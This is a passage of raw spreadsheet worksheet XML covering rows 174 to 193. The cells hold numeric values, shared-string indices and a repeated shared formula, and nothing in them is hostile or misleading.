        <v>0.0</v>
      </c>
      <c r="P174" s="29">
        <v>2.0</v>
      </c>
      <c r="Q174" s="15"/>
      <c r="R174" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S174" s="15"/>
      <c r="T174" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U174" s="5"/>
      <c r="V174" s="5"/>
      <c r="W174" s="45"/>
      <c r="X174" s="45"/>
      <c r="Y174" s="45"/>
      <c r="Z174" s="38" t="s">
        <v>1630</v>
      </c>
      <c r="AA174" s="39" t="s">
        <v>1631</v>
      </c>
      <c r="AB174" s="38" t="s">
        <v>1632</v>
      </c>
      <c r="AC174" s="40">
        <v>213713.0</v>
      </c>
      <c r="AD174" s="5"/>
      <c r="AE174" s="14"/>
      <c r="AF174" s="14"/>
    </row>
    <row r="175">
      <c r="A175" s="6">
        <f t="shared" si="1"/>
        <v>0.4431654818</v>
      </c>
      <c r="B175" s="29">
        <v>1.0</v>
      </c>
      <c r="C175" s="29">
        <v>96154.0</v>
      </c>
      <c r="D175" s="14"/>
      <c r="E175" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F175" s="14"/>
      <c r="G175" s="29">
        <v>121.0</v>
      </c>
      <c r="H175" s="29">
        <v>52006.0</v>
      </c>
      <c r="I175" s="29">
        <v>82823.0</v>
      </c>
      <c r="J175" s="15"/>
      <c r="K175" s="29">
        <v>82841.0</v>
      </c>
      <c r="L175" s="15"/>
      <c r="M175" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N175" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O175" s="29">
        <v>5.0</v>
      </c>
      <c r="P175" s="29">
        <v>11.0</v>
      </c>
      <c r="Q175" s="15"/>
      <c r="R175" s="15"/>
      <c r="S175" s="15"/>
      <c r="T175" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U175" s="5"/>
      <c r="V175" s="5"/>
      <c r="W175" s="47"/>
      <c r="X175" s="45"/>
      <c r="Y175" s="45"/>
      <c r="Z175" s="38" t="s">
        <v>1633</v>
      </c>
      <c r="AA175" s="39" t="s">
        <v>1634</v>
      </c>
      <c r="AB175" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC175" s="40">
        <v>96121.0</v>
      </c>
      <c r="AD175" s="5"/>
      <c r="AE175" s="14"/>
      <c r="AF175" s="14"/>
    </row>
    <row r="176">
      <c r="A176" s="6">
        <f t="shared" si="1"/>
        <v>0.4518738663</v>
      </c>
      <c r="B176" s="29">
        <v>1.0</v>
      </c>
      <c r="C176" s="15"/>
      <c r="D176" s="14"/>
      <c r="E176" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F176" s="14"/>
      <c r="G176" s="29">
        <v>1.0</v>
      </c>
      <c r="H176" s="29">
        <v>389.0</v>
      </c>
      <c r="I176" s="29">
        <v>275194.0</v>
      </c>
      <c r="J176" s="15"/>
      <c r="K176" s="15"/>
      <c r="L176" s="15"/>
      <c r="M176" s="15"/>
      <c r="N176" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O176" s="29">
        <v>0.0</v>
      </c>
      <c r="P176" s="29">
        <v>2.0</v>
      </c>
      <c r="Q176" s="15"/>
      <c r="R176" s="15"/>
      <c r="S176" s="15"/>
      <c r="T176" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U176" s="5"/>
      <c r="V176" s="5"/>
      <c r="W176" s="47"/>
      <c r="X176" s="45"/>
      <c r="Y176" s="45"/>
      <c r="Z176" s="38" t="s">
        <v>1635</v>
      </c>
      <c r="AA176" s="39" t="s">
        <v>1636</v>
      </c>
      <c r="AB176" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC176" s="40">
        <v>260066.0</v>
      </c>
      <c r="AD176" s="5"/>
      <c r="AE176" s="14"/>
      <c r="AF176" s="14"/>
    </row>
    <row r="177">
      <c r="A177" s="6">
        <f t="shared" si="1"/>
        <v>0.5807395962</v>
      </c>
      <c r="B177" s="29">
        <v>1.0</v>
      </c>
      <c r="C177" s="29">
        <v>219110.0</v>
      </c>
      <c r="D177" s="14"/>
      <c r="E177" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F177" s="14"/>
      <c r="G177" s="29">
        <v>2.0</v>
      </c>
      <c r="H177" s="29">
        <v>559.0</v>
      </c>
      <c r="I177" s="29">
        <v>219129.0</v>
      </c>
      <c r="J177" s="15"/>
      <c r="K177" s="15"/>
      <c r="L177" s="15"/>
      <c r="M177" s="15"/>
      <c r="N177" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O177" s="29">
        <v>1.0</v>
      </c>
      <c r="P177" s="29">
        <v>6.0</v>
      </c>
      <c r="Q177" s="15"/>
      <c r="R177" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S177" s="15"/>
      <c r="T177" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U177" s="5"/>
      <c r="V177" s="5"/>
      <c r="W177" s="47"/>
      <c r="X177" s="45"/>
      <c r="Y177" s="45"/>
      <c r="Z177" s="38" t="s">
        <v>1637</v>
      </c>
      <c r="AA177" s="39" t="s">
        <v>1638</v>
      </c>
      <c r="AB177" s="38" t="s">
        <v>1639</v>
      </c>
      <c r="AC177" s="40">
        <v>219108.0</v>
      </c>
      <c r="AD177" s="5"/>
      <c r="AE177" s="14"/>
      <c r="AF177" s="14"/>
    </row>
    <row r="178">
      <c r="A178" s="6">
        <f t="shared" si="1"/>
        <v>0.2654399976</v>
      </c>
      <c r="B178" s="29">
        <v>1.0</v>
      </c>
      <c r="C178" s="15"/>
      <c r="D178" s="14"/>
      <c r="E178" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F178" s="14"/>
      <c r="G178" s="29">
        <v>0.0</v>
      </c>
      <c r="H178" s="29">
        <v>370.0</v>
      </c>
      <c r="I178" s="29">
        <v>17877.0</v>
      </c>
      <c r="J178" s="15"/>
      <c r="K178" s="29">
        <v>11801.0</v>
      </c>
      <c r="L178" s="15"/>
      <c r="M178" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N178" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O178" s="29">
        <v>2.0</v>
      </c>
      <c r="P178" s="29">
        <v>0.0</v>
      </c>
      <c r="Q178" s="29">
        <v>0.0</v>
      </c>
      <c r="R178" s="15"/>
      <c r="S178" s="15"/>
      <c r="T178" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U178" s="5"/>
      <c r="V178" s="5"/>
      <c r="W178" s="47"/>
      <c r="X178" s="45"/>
      <c r="Y178" s="45"/>
      <c r="Z178" s="38" t="s">
        <v>1640</v>
      </c>
      <c r="AA178" s="39" t="s">
        <v>1641</v>
      </c>
      <c r="AB178" s="38" t="s">
        <v>1642</v>
      </c>
      <c r="AC178" s="40">
        <v>25883.0</v>
      </c>
      <c r="AD178" s="5"/>
      <c r="AE178" s="14"/>
      <c r="AF178" s="14"/>
    </row>
    <row r="179">
      <c r="A179" s="6">
        <f t="shared" si="1"/>
        <v>0.1641208128</v>
      </c>
      <c r="B179" s="29">
        <v>1.0</v>
      </c>
      <c r="C179" s="29">
        <v>109873.0</v>
      </c>
      <c r="D179" s="14"/>
      <c r="E179" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F179" s="14"/>
      <c r="G179" s="29">
        <v>-2.0</v>
      </c>
      <c r="H179" s="29">
        <v>159.0</v>
      </c>
      <c r="I179" s="29">
        <v>87427.0</v>
      </c>
      <c r="J179" s="15"/>
      <c r="K179" s="29">
        <v>32746.0</v>
      </c>
      <c r="L179" s="15"/>
      <c r="M179" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N179" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O179" s="29">
        <v>2.0</v>
      </c>
      <c r="P179" s="29">
        <v>12.0</v>
      </c>
      <c r="Q179" s="15"/>
      <c r="R179" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S179" s="15"/>
      <c r="T179" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U179" s="5"/>
      <c r="V179" s="5"/>
      <c r="W179" s="47"/>
      <c r="X179" s="45"/>
      <c r="Y179" s="45"/>
      <c r="Z179" s="38" t="s">
        <v>1643</v>
      </c>
      <c r="AA179" s="39" t="s">
        <v>1644</v>
      </c>
      <c r="AB179" s="38" t="s">
        <v>1645</v>
      </c>
      <c r="AC179" s="40">
        <v>109849.0</v>
      </c>
      <c r="AD179" s="5"/>
      <c r="AE179" s="14"/>
      <c r="AF179" s="14"/>
    </row>
    <row r="180">
      <c r="A180" s="6">
        <f t="shared" si="1"/>
        <v>0.01714074548</v>
      </c>
      <c r="B180" s="29">
        <v>1.0</v>
      </c>
      <c r="C180" s="29">
        <v>197203.0</v>
      </c>
      <c r="D180" s="14"/>
      <c r="E180" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F180" s="14"/>
      <c r="G180" s="29">
        <v>2.0</v>
      </c>
      <c r="H180" s="29">
        <v>1398.0</v>
      </c>
      <c r="I180" s="29">
        <v>190749.0</v>
      </c>
      <c r="J180" s="15"/>
      <c r="K180" s="15"/>
      <c r="L180" s="15"/>
      <c r="M180" s="14"/>
      <c r="N180" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O180" s="29">
        <v>1.0</v>
      </c>
      <c r="P180" s="29">
        <v>6.0</v>
      </c>
      <c r="Q180" s="15"/>
      <c r="R180" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S180" s="15"/>
      <c r="T180" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U180" s="5"/>
      <c r="V180" s="5"/>
      <c r="W180" s="47"/>
      <c r="X180" s="45"/>
      <c r="Y180" s="45"/>
      <c r="Z180" s="38" t="s">
        <v>1646</v>
      </c>
      <c r="AA180" s="39" t="s">
        <v>1647</v>
      </c>
      <c r="AB180" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC180" s="40">
        <v>197201.0</v>
      </c>
      <c r="AD180" s="5"/>
      <c r="AE180" s="14"/>
      <c r="AF180" s="14"/>
    </row>
    <row r="181">
      <c r="A181" s="6">
        <f t="shared" si="1"/>
        <v>0.6780383974</v>
      </c>
      <c r="B181" s="29">
        <v>1.0</v>
      </c>
      <c r="C181" s="14"/>
      <c r="D181" s="14"/>
      <c r="E181" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F181" s="14"/>
      <c r="G181" s="29">
        <v>0.0</v>
      </c>
      <c r="H181" s="29">
        <v>155.0</v>
      </c>
      <c r="I181" s="29">
        <v>267436.0</v>
      </c>
      <c r="J181" s="15"/>
      <c r="K181" s="29">
        <v>6253.0</v>
      </c>
      <c r="L181" s="15"/>
      <c r="M181" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N181" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O181" s="29">
        <v>1.0</v>
      </c>
      <c r="P181" s="29">
        <v>1.0</v>
      </c>
      <c r="Q181" s="15"/>
      <c r="R181" s="15"/>
      <c r="S181" s="15"/>
      <c r="T181" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U181" s="5"/>
      <c r="V181" s="5"/>
      <c r="W181" s="47"/>
      <c r="X181" s="45"/>
      <c r="Y181" s="45"/>
      <c r="Z181" s="38" t="s">
        <v>1648</v>
      </c>
      <c r="AA181" s="39" t="s">
        <v>1649</v>
      </c>
      <c r="AB181" s="38" t="s">
        <v>1650</v>
      </c>
      <c r="AC181" s="40">
        <v>255405.0</v>
      </c>
      <c r="AD181" s="5"/>
      <c r="AE181" s="14"/>
      <c r="AF181" s="14"/>
    </row>
    <row r="182">
      <c r="A182" s="6">
        <f t="shared" si="1"/>
        <v>0.4891394698</v>
      </c>
      <c r="B182" s="29">
        <v>1.0</v>
      </c>
      <c r="C182" s="15"/>
      <c r="D182" s="14"/>
      <c r="E182" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F182" s="14"/>
      <c r="G182" s="29">
        <v>0.0</v>
      </c>
      <c r="H182" s="29">
        <v>1006.0</v>
      </c>
      <c r="I182" s="29">
        <v>20636.0</v>
      </c>
      <c r="J182" s="15"/>
      <c r="K182" s="29">
        <v>20636.0</v>
      </c>
      <c r="L182" s="15"/>
      <c r="M182" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N182" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O182" s="29">
        <v>0.0</v>
      </c>
      <c r="P182" s="29">
        <v>4.0</v>
      </c>
      <c r="Q182" s="15"/>
      <c r="R182" s="15"/>
      <c r="S182" s="15"/>
      <c r="T182" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U182" s="5"/>
      <c r="V182" s="5"/>
      <c r="W182" s="47"/>
      <c r="X182" s="45"/>
      <c r="Y182" s="45"/>
      <c r="Z182" s="38" t="s">
        <v>1651</v>
      </c>
      <c r="AA182" s="39" t="s">
        <v>1652</v>
      </c>
      <c r="AB182" s="38" t="s">
        <v>1653</v>
      </c>
      <c r="AC182" s="40">
        <v>245889.0</v>
      </c>
      <c r="AD182" s="5"/>
      <c r="AE182" s="14"/>
      <c r="AF182" s="14"/>
    </row>
    <row r="183">
      <c r="A183" s="6">
        <f t="shared" si="1"/>
        <v>0.71840075</v>
      </c>
      <c r="B183" s="29">
        <v>1.0</v>
      </c>
      <c r="C183" s="14"/>
      <c r="D183" s="14"/>
      <c r="E183" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F183" s="14"/>
      <c r="G183" s="29">
        <v>1.0</v>
      </c>
      <c r="H183" s="29">
        <v>197.0</v>
      </c>
      <c r="I183" s="29">
        <v>162173.0</v>
      </c>
      <c r="J183" s="15"/>
      <c r="K183" s="29">
        <v>162173.0</v>
      </c>
      <c r="L183" s="15"/>
      <c r="M183" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N183" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O183" s="29">
        <v>2.0</v>
      </c>
      <c r="P183" s="29">
        <v>4.0</v>
      </c>
      <c r="Q183" s="15"/>
      <c r="R183" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S183" s="15"/>
      <c r="T183" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U183" s="5"/>
      <c r="V183" s="5"/>
      <c r="W183" s="47"/>
      <c r="X183" s="45"/>
      <c r="Y183" s="45"/>
      <c r="Z183" s="38" t="s">
        <v>1654</v>
      </c>
      <c r="AA183" s="39" t="s">
        <v>1655</v>
      </c>
      <c r="AB183" s="38" t="s">
        <v>1656</v>
      </c>
      <c r="AC183" s="40">
        <v>172109.0</v>
      </c>
      <c r="AD183" s="5"/>
      <c r="AE183" s="14"/>
      <c r="AF183" s="14"/>
    </row>
    <row r="184">
      <c r="A184" s="6">
        <f t="shared" si="1"/>
        <v>0.4400061219</v>
      </c>
      <c r="B184" s="29">
        <v>1.0</v>
      </c>
      <c r="C184" s="29">
        <v>120170.0</v>
      </c>
      <c r="D184" s="14"/>
      <c r="E184" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F184" s="14"/>
      <c r="G184" s="29">
        <v>5.0</v>
      </c>
      <c r="H184" s="29">
        <v>2870.0</v>
      </c>
      <c r="I184" s="29">
        <v>8754.0</v>
      </c>
      <c r="J184" s="15"/>
      <c r="K184" s="29">
        <v>52758.0</v>
      </c>
      <c r="L184" s="15"/>
      <c r="M184" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N184" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O184" s="29">
        <v>2.0</v>
      </c>
      <c r="P184" s="29">
        <v>0.0</v>
      </c>
      <c r="Q184" s="15"/>
      <c r="R184" s="15"/>
      <c r="S184" s="15"/>
      <c r="T184" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U184" s="5"/>
      <c r="V184" s="5"/>
      <c r="W184" s="47"/>
      <c r="X184" s="45"/>
      <c r="Y184" s="45"/>
      <c r="Z184" s="38" t="s">
        <v>1657</v>
      </c>
      <c r="AA184" s="39" t="s">
        <v>1658</v>
      </c>
      <c r="AB184" s="38" t="s">
        <v>1659</v>
      </c>
      <c r="AC184" s="40">
        <v>120169.0</v>
      </c>
      <c r="AD184" s="5"/>
      <c r="AE184" s="14"/>
      <c r="AF184" s="14"/>
    </row>
    <row r="185">
      <c r="A185" s="6">
        <f t="shared" si="1"/>
        <v>0.7577404223</v>
      </c>
      <c r="B185" s="29">
        <v>1.0</v>
      </c>
      <c r="C185" s="15"/>
      <c r="D185" s="14"/>
      <c r="E185" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F185" s="14"/>
      <c r="G185" s="29">
        <v>3.0</v>
      </c>
      <c r="H185" s="29">
        <v>559.0</v>
      </c>
      <c r="I185" s="29">
        <v>200992.0</v>
      </c>
      <c r="J185" s="15"/>
      <c r="K185" s="29">
        <v>6253.0</v>
      </c>
      <c r="L185" s="15"/>
      <c r="M185" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N185" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O185" s="29">
        <v>2.0</v>
      </c>
      <c r="P185" s="29">
        <v>1.0</v>
      </c>
      <c r="Q185" s="15"/>
      <c r="R185" s="15"/>
      <c r="S185" s="15"/>
      <c r="T185" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U185" s="5"/>
      <c r="V185" s="5"/>
      <c r="W185" s="47"/>
      <c r="X185" s="45"/>
      <c r="Y185" s="45"/>
      <c r="Z185" s="38" t="s">
        <v>1660</v>
      </c>
      <c r="AA185" s="39" t="s">
        <v>1661</v>
      </c>
      <c r="AB185" s="38" t="s">
        <v>1662</v>
      </c>
      <c r="AC185" s="40">
        <v>204641.0</v>
      </c>
      <c r="AD185" s="5"/>
      <c r="AE185" s="14"/>
      <c r="AF185" s="14"/>
    </row>
    <row r="186">
      <c r="A186" s="6">
        <f t="shared" si="1"/>
        <v>0.3650392964</v>
      </c>
      <c r="B186" s="29">
        <v>1.0</v>
      </c>
      <c r="C186" s="15"/>
      <c r="D186" s="14"/>
      <c r="E186" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F186" s="14"/>
      <c r="G186" s="29">
        <v>3.0</v>
      </c>
      <c r="H186" s="29">
        <v>163.0</v>
      </c>
      <c r="I186" s="29">
        <v>139972.0</v>
      </c>
      <c r="J186" s="15"/>
      <c r="K186" s="15"/>
      <c r="L186" s="15"/>
      <c r="M186" s="14"/>
      <c r="N186" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O186" s="29">
        <v>3.0</v>
      </c>
      <c r="P186" s="29">
        <v>0.0</v>
      </c>
      <c r="Q186" s="15"/>
      <c r="R186" s="15"/>
      <c r="S186" s="15"/>
      <c r="T186" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U186" s="5"/>
      <c r="V186" s="5"/>
      <c r="W186" s="47"/>
      <c r="X186" s="45"/>
      <c r="Y186" s="45"/>
      <c r="Z186" s="38" t="s">
        <v>1663</v>
      </c>
      <c r="AA186" s="39" t="s">
        <v>1664</v>
      </c>
      <c r="AB186" s="38" t="s">
        <v>1426</v>
      </c>
      <c r="AC186" s="40">
        <v>154550.0</v>
      </c>
      <c r="AD186" s="5"/>
      <c r="AE186" s="14"/>
      <c r="AF186" s="14"/>
    </row>
    <row r="187">
      <c r="A187" s="6">
        <f t="shared" si="1"/>
        <v>0.6129584855</v>
      </c>
      <c r="B187" s="29">
        <v>1.0</v>
      </c>
      <c r="C187" s="29">
        <v>158885.0</v>
      </c>
      <c r="D187" s="14"/>
      <c r="E187" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F187" s="14"/>
      <c r="G187" s="29">
        <v>4.0</v>
      </c>
      <c r="H187" s="29">
        <v>24351.0</v>
      </c>
      <c r="I187" s="29">
        <v>147547.0</v>
      </c>
      <c r="J187" s="15"/>
      <c r="K187" s="29">
        <v>37315.0</v>
      </c>
      <c r="L187" s="15"/>
      <c r="M187" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N187" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O187" s="29">
        <v>2.0</v>
      </c>
      <c r="P187" s="29">
        <v>6.0</v>
      </c>
      <c r="Q187" s="15"/>
      <c r="R187" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S187" s="15"/>
      <c r="T187" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U187" s="5"/>
      <c r="V187" s="5"/>
      <c r="W187" s="47"/>
      <c r="X187" s="45"/>
      <c r="Y187" s="45"/>
      <c r="Z187" s="38" t="s">
        <v>1665</v>
      </c>
      <c r="AA187" s="39" t="s">
        <v>1666</v>
      </c>
      <c r="AB187" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC187" s="40">
        <v>158883.0</v>
      </c>
      <c r="AD187" s="5"/>
      <c r="AE187" s="14"/>
      <c r="AF187" s="14"/>
    </row>
    <row r="188">
      <c r="A188" s="24">
        <f t="shared" si="1"/>
        <v>0.9787986762</v>
      </c>
      <c r="B188" s="48">
        <v>1.0</v>
      </c>
      <c r="C188" s="27"/>
      <c r="D188" s="27"/>
      <c r="E188" s="49" t="s">
        <v>30</v>
      </c>
      <c r="F188" s="27"/>
      <c r="G188" s="48">
        <v>1.0</v>
      </c>
      <c r="H188" s="48">
        <v>110.0</v>
      </c>
      <c r="I188" s="48">
        <v>179224.0</v>
      </c>
      <c r="J188" s="50"/>
      <c r="K188" s="50"/>
      <c r="L188" s="50"/>
      <c r="M188" s="50"/>
      <c r="N188" s="49" t="s">
        <v>30</v>
      </c>
      <c r="O188" s="48">
        <v>0.0</v>
      </c>
      <c r="P188" s="48">
        <v>1.0</v>
      </c>
      <c r="Q188" s="50"/>
      <c r="R188" s="50"/>
      <c r="S188" s="50"/>
      <c r="T188" s="51" t="s">
        <v>70</v>
      </c>
      <c r="U188" s="5"/>
      <c r="V188" s="5"/>
      <c r="W188" s="27"/>
      <c r="X188" s="50"/>
      <c r="Y188" s="24" t="s">
        <v>1667</v>
      </c>
      <c r="Z188" s="51" t="s">
        <v>1668</v>
      </c>
      <c r="AA188" s="52" t="s">
        <v>1669</v>
      </c>
      <c r="AB188" s="51" t="s">
        <v>1562</v>
      </c>
      <c r="AC188" s="48">
        <v>186768.0</v>
      </c>
      <c r="AD188" s="51"/>
      <c r="AE188" s="27"/>
      <c r="AF188" s="27"/>
    </row>
    <row r="189">
      <c r="A189" s="6">
        <f t="shared" si="1"/>
        <v>0.4466411422</v>
      </c>
      <c r="B189" s="29">
        <v>1.0</v>
      </c>
      <c r="C189" s="29">
        <v>26380.0</v>
      </c>
      <c r="D189" s="14"/>
      <c r="E189" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F189" s="14"/>
      <c r="G189" s="29">
        <v>20.0</v>
      </c>
      <c r="H189" s="29">
        <v>3800.0</v>
      </c>
      <c r="I189" s="29">
        <v>5248.0</v>
      </c>
      <c r="J189" s="15"/>
      <c r="K189" s="29">
        <v>-1.0</v>
      </c>
      <c r="L189" s="15"/>
      <c r="M189" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N189" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O189" s="29">
        <v>3.0</v>
      </c>
      <c r="P189" s="29">
        <v>0.0</v>
      </c>
      <c r="Q189" s="15"/>
      <c r="R189" s="15"/>
      <c r="S189" s="15"/>
      <c r="T189" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U189" s="5"/>
      <c r="V189" s="5"/>
      <c r="W189" s="47"/>
      <c r="X189" s="45"/>
      <c r="Y189" s="45"/>
      <c r="Z189" s="38" t="s">
        <v>1670</v>
      </c>
      <c r="AA189" s="39" t="s">
        <v>1671</v>
      </c>
      <c r="AB189" s="38" t="s">
        <v>1672</v>
      </c>
      <c r="AC189" s="40">
        <v>26347.0</v>
      </c>
      <c r="AD189" s="5"/>
      <c r="AE189" s="14"/>
      <c r="AF189" s="14"/>
    </row>
    <row r="190">
      <c r="A190" s="6">
        <f t="shared" si="1"/>
        <v>0.2606965404</v>
      </c>
      <c r="B190" s="29">
        <v>1.0</v>
      </c>
      <c r="C190" s="14"/>
      <c r="D190" s="14"/>
      <c r="E190" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F190" s="14"/>
      <c r="G190" s="29">
        <v>2.0</v>
      </c>
      <c r="H190" s="29">
        <v>322.0</v>
      </c>
      <c r="I190" s="29">
        <v>180399.0</v>
      </c>
      <c r="J190" s="15"/>
      <c r="K190" s="15"/>
      <c r="L190" s="15"/>
      <c r="M190" s="14"/>
      <c r="N190" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O190" s="29">
        <v>1.0</v>
      </c>
      <c r="P190" s="29">
        <v>3.0</v>
      </c>
      <c r="Q190" s="15"/>
      <c r="R190" s="15"/>
      <c r="S190" s="15"/>
      <c r="T190" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U190" s="5"/>
      <c r="V190" s="5"/>
      <c r="W190" s="47"/>
      <c r="X190" s="45"/>
      <c r="Y190" s="45"/>
      <c r="Z190" s="38" t="s">
        <v>1673</v>
      </c>
      <c r="AA190" s="39" t="s">
        <v>1674</v>
      </c>
      <c r="AB190" s="38" t="s">
        <v>1675</v>
      </c>
      <c r="AC190" s="40">
        <v>187916.0</v>
      </c>
      <c r="AD190" s="5"/>
      <c r="AE190" s="14"/>
      <c r="AF190" s="14"/>
    </row>
    <row r="191">
      <c r="A191" s="6">
        <f t="shared" si="1"/>
        <v>0.6649626776</v>
      </c>
      <c r="B191" s="29">
        <v>1.0</v>
      </c>
      <c r="C191" s="29">
        <v>111105.0</v>
      </c>
      <c r="D191" s="14"/>
      <c r="E191" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F191" s="14"/>
      <c r="G191" s="29">
        <v>1.0</v>
      </c>
      <c r="H191" s="29">
        <v>1702.0</v>
      </c>
      <c r="I191" s="29">
        <v>36196.0</v>
      </c>
      <c r="J191" s="15"/>
      <c r="K191" s="29">
        <v>-1.0</v>
      </c>
      <c r="L191" s="15"/>
      <c r="M191" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N191" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O191" s="29">
        <v>1.0</v>
      </c>
      <c r="P191" s="29">
        <v>5.0</v>
      </c>
      <c r="Q191" s="15"/>
      <c r="R191" s="15"/>
      <c r="S191" s="15"/>
      <c r="T191" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U191" s="5"/>
      <c r="V191" s="5"/>
      <c r="W191" s="47"/>
      <c r="X191" s="45"/>
      <c r="Y191" s="45"/>
      <c r="Z191" s="38" t="s">
        <v>1676</v>
      </c>
      <c r="AA191" s="39" t="s">
        <v>1677</v>
      </c>
      <c r="AB191" s="38" t="s">
        <v>1678</v>
      </c>
      <c r="AC191" s="40">
        <v>111099.0</v>
      </c>
      <c r="AD191" s="5"/>
      <c r="AE191" s="14"/>
      <c r="AF191" s="14"/>
    </row>
    <row r="192">
      <c r="A192" s="6">
        <f t="shared" si="1"/>
        <v>0.997183276</v>
      </c>
      <c r="B192" s="29">
        <v>1.0</v>
      </c>
      <c r="C192" s="15"/>
      <c r="D192" s="14"/>
      <c r="E192" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F192" s="14"/>
      <c r="G192" s="29">
        <v>0.0</v>
      </c>
      <c r="H192" s="29">
        <v>1688.0</v>
      </c>
      <c r="I192" s="29">
        <v>140251.0</v>
      </c>
      <c r="J192" s="15"/>
      <c r="K192" s="29">
        <v>140251.0</v>
      </c>
      <c r="L192" s="15"/>
      <c r="M192" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N192" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O192" s="29">
        <v>2.0</v>
      </c>
      <c r="P192" s="29">
        <v>2.0</v>
      </c>
      <c r="Q192" s="15"/>
      <c r="R192" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S192" s="15"/>
      <c r="T192" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U192" s="5"/>
      <c r="V192" s="5"/>
      <c r="W192" s="47"/>
      <c r="X192" s="45"/>
      <c r="Y192" s="45"/>
      <c r="Z192" s="38" t="s">
        <v>1679</v>
      </c>
      <c r="AA192" s="39" t="s">
        <v>1680</v>
      </c>
      <c r="AB192" s="38" t="s">
        <v>1681</v>
      </c>
      <c r="AC192" s="40">
        <v>152177.0</v>
      </c>
      <c r="AD192" s="5"/>
      <c r="AE192" s="14"/>
      <c r="AF192" s="14"/>
    </row>
    <row r="193">
      <c r="A193" s="6">
        <f t="shared" si="1"/>
        <v>0.08257826998</v>
      </c>
      <c r="B193" s="29">
        <v>1.0</v>
      </c>
      <c r="C193" s="29">
        <v>144805.0</v>
      </c>
      <c r="D193" s="14"/>
      <c r="E193" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F193" s="14"/>
      <c r="G193" s="29">
        <v>2.0</v>
      </c>
      <c r="H193" s="29">
        <v>145.0</v>
      </c>
      <c r="I193" s="29">
        <v>129230.0</v>
      </c>
      <c r="J193" s="15"/>
      <c r="K193" s="29">
        <v>129230.0</v>
      </c>
      <c r="L193" s="15"/>
      <c r="M193" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N193" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O193" s="29">
        <v>1.0</v>
      </c>
      <c r="P193" s="29">
        <v>3.0</v>
      </c>
      <c r="Q193" s="15"/>
      <c r="R193" s="15"/>
      <c r="S193" s="15"/>
      <c r="T193" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U193" s="5"/>
      <c r="V193" s="5"/>
      <c r="W193" s="47"/>
      <c r="X193" s="45"/>
      <c r="Y193" s="45"/>
      <c r="Z193" s="38" t="s">
        <v>1682</v>
      </c>
      <c r="AA193" s="39" t="s">
        <v>1683</v>
      </c>
      <c r="AB193" s="38" t="s">
        <v>1684</v>
      </c>
      <c r="AC193" s="40">
        <v>144803.0</v>
      </c>
      <c r="AD193" s="5"/>
      <c r="AE193" s="14"/>
      <c r="AF193" s="14"/>
    </row>
    <row r="194">
